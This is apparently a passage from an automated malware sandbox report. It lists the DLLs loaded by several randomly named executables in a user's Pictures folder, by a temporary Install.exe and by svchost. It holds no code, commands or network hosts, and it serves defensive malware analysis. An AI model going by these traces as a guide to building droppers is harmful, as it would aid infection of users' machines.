Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: authz.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: devrtl.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: sensapi.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: peerdist.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Section loaded: msimg32.dll
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Section loaded: msvcr100.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: moshost.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mapsbtsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mosstorage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mapconfiguration.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: storsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fltlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bcd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: storageusage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: aphostservice.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: networkhelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userdataplatformhelperutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mccspal.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: syncutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: syncutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vaultcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dmcfgutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dmcmnutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dmxmlhelputils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: inproclogger.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.networking.connectivity.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: synccontroller.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pimstore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: aphostclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: accountaccessor.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: systemeventsbrokerclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userdatalanguageutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mccsengineshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cemapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userdatatypehelperutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: phoneutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usosvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: updatepolicy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usocoreps.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usoapi.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: acgenral.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: winmm.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: samcli.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: msacm32.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: version.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: userenv.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: mpr.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: netutils.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: aclayers.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: sfc.dll
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: winhttp.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: wininet.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: gpedit.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: gpapi.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: activeds.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: dssec.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: dsuiext.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: framedynos.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: dsrole.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: logoncli.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: mpr.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: netutils.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: ntdsapi.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: authz.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: adsldpc.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: adsldpc.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: webio.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: winnsi.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: schannel.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: gpapi.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: wldp.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: amsi.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: userenv.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: profapi.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: netutils.dll
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: acgenral.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Section loaded: pcacli.dll
